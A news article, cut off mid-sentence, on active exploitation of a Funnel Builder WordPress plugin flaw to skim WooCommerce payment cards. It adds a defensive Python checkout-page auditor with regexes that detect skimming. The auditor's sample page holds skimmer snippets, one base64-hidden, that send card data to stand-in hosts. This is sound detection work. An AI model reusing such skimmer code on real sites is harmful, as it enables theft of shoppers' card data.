Attackers are actively exploiting a critical vulnerability in the Funnel Builder WordPress plugin to inject malicious JavaScript into WooCommerce checkout pages and steal customers' payment card data.
The flaw lets unauthenticated threat actors inject code directly into the checkout process. Once in place, the malicious JavaScript captures payment card data as customers type it in to complete a transaction, a client-side skimming attack that strikes at the moment of maximum sensitivity: the point at which users voluntarily enter full card numbers, expiration dates and CVV codes.
Funnel Builder, a popular WordPress plugin used to create sales funnels and optimize checkout flows, failed to properly sanitize and validate user input. That missing validation gave unauthenticated attackers a way to insert arbitrary JavaScript payloads. WooCommerce, the leading e-commerce platform for WordPress, is where the injected code ends up running: its checkout page serves the data-stealing script to every shopper who loads it.
Active exploitation means the vulnerability is already weaponized. On any site running a vulnerable version, every transaction on a compromised checkout page is exposed to interception, and stolen card data has immediate resale value on underground markets, which gives attackers a financial incentive to keep going.
Website owners running Funnel Builder should immediately update to the patched version; the plugin developers have released a security update addressing the input validation flaw. Updating closes the hole but does not remove anything an attacker has already injected, so administrators should also audit their WooCommerce checkout pages, as served to a shopper, for injected JavaScript. It often appears in the page source as unexpected script tags, scripts loaded from unfamiliar domains, or base64-encoded payloads.
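As an added illustration of that audit (example code, not part of the original article or of the Funnel Builder or WooCommerce projects), the following Python script parses a saved copy of the checkout page, lists scripts loaded from hosts outside an allow-list, and flags inline scripts that both touch card or form input and exfiltrate or hide their logic, including logic hidden inside base64 blobs. The allow-list, the hostnames and the sample page are assumptions constructed for the example.

```python
"""Audit a WooCommerce checkout page's HTML for injected JavaScript.
Added example, not code from the article, Funnel Builder or WooCommerce.  Feed
audit_checkout_html() the raw HTML served to an anonymous visitor; the host
allow-list and the sample page below are constructed for illustration."""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this store legitimately loads scripts from (assumption for the example).
ALLOWED_SCRIPT_HOSTS = {"shop.example.com", "js.stripe.com"}
# Heuristic indicators: an inline script is reported when it touches card data
# or form input AND also exfiltrates or hides its logic.
INDICATORS = {
    "card_fields": r"\b(?:card|cc|cvv|cvc|expir)[\w-]*",
    "input_capture": r"addEventListener\s*\(\s*['\"](?:submit|keyup|keydown|input|change)['\"]|\.value\b",
    "exfiltration": r"\bfetch\s*\(|XMLHttpRequest|sendBeacon|new\s+Image\s*\(|WebSocket",
    "obfuscation": r"\batob\s*\(|\beval\s*\(|String\.fromCharCode|\bunescape\s*\(",
}
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")

class _ScriptCollector(HTMLParser):
    """Collect inline <script> bodies and external script URLs with line numbers."""
    def __init__(self):
        super().__init__()
        self.inline, self.external = [], []   # (line_no, body) / (line_no, src)
        self._line, self._buf = 0, None       # _buf is a list while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        self._line = self.getpos()[0]
        src = dict(attrs).get("src")
        if src:
            self.external.append((self._line, src))
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append((self._line, "".join(self._buf)))
            self._buf = None

def _matches(text):
    """Names of INDICATORS whose pattern occurs in text."""
    return {n for n, p in INDICATORS.items() if re.search(p, text, re.IGNORECASE)}

def _decode_base64_blobs(body):
    """Yield decoded text of every long base64 run in a script body."""
    for m in BASE64_BLOB.finditer(body):
        s = m.group(0).rstrip("=")
        try:
            yield base64.b64decode(s + "=" * (-len(s) % 4)).decode("utf-8", "ignore")
        except ValueError:      # not valid base64 after all
            continue

def classify_script(body):
    """Indicator names matched by a script, including text hidden in base64 blobs."""
    hits = _matches(body)
    for decoded in _decode_base64_blobs(body):
        inner = _matches(decoded)
        if inner:   # a blob that decodes to script-like text is itself a signal
            hits |= inner | {"base64_payload"}
    return hits

def is_suspicious(hits):
    """Decision rule: card/form access combined with exfiltration or obfuscation."""
    return (bool(hits & {"card_fields", "input_capture"})
            and bool(hits & {"exfiltration", "obfuscation", "base64_payload"}))

def audit_checkout_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return findings as (line_no, reason, snippet), sorted by line."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for line, src in parser.external:
        host = urlparse(src).hostname   # None for relative paths such as /wp-content/...
        if host and host not in allowed_hosts:
            findings.append((line, f"script loaded from unexpected host {host}", src))
    for line, body in parser.inline:
        hits = classify_script(body)
        if is_suspicious(hits):
            findings.append((line, "inline script: " + ", ".join(sorted(hits)), body.strip()[:70]))
    return sorted(findings)

# Constructed sample: legitimate scripts on lines 2-3, then three injected ones
# (a plain skimmer, an eval(atob()) skimmer, and a loader from an off-site host).
_HIDDEN_JS = (b"document.addEventListener('keyup',function(e){"
              b"if(/card|cvv/i.test(e.target.name)){new Image().src="
              b"'https://stat-collect.example.net/p?'+e.target.name+'='+e.target.value}})")
SAMPLE_CHECKOUT_HTML = """<html><body>
<script src="https://shop.example.com/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
<script>var wc_checkout_params = {"ajax_url":"/wp-admin/admin-ajax.php","i18n_checkout_error":"Error"};</script>
<form class="checkout"><input id="wc-credit-card-number" name="card-number"></form>
<script>(function(){var f=document.querySelector('form.checkout');f.addEventListener('submit',function(){var d=document.getElementById('wc-credit-card-number').value;navigator.sendBeacon('https://cdn-stat.example.net/c',d)})})();</script>
<script>eval(atob("__B64__"));</script>
<script src="//cdn-stat.example.net/jquery.min.js"></script>
</body></html>""".replace("__B64__", base64.b64encode(_HIDDEN_JS).decode())

if __name__ == "__main__":
    for line, reason, snippet in audit_checkout_html(SAMPLE_CHECKOUT_HTML):
        print(f"line {line}: {reason}\n    {snippet}")
```

Run it against the HTML exactly as a shopper receives it, since that is the page the article describes as compromised, and treat hits as leads rather than verdicts: a legitimate payment gateway script can also touch card fields and call fetch(), so compare any flagged script against a known-clean copy of the page or the plugin's shipped assets before removing it. The decision rule is deliberately conservative in the other direction too; a script that only reads card fields, or only calls atob(), is not reported on its own.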
Customers of affected stores face fraud risk if their card details were captured during the exploitation window. They should monitor bank and credit card statements for unauthorized charges and dispute any that fall within that window. Payment card networks typically provide fraud protection, but proactive monitoring speeds up dispute resolution.
This incident underscores the security risk posed by third-party WordPress plugins. Plugin vulnerabilities represent a
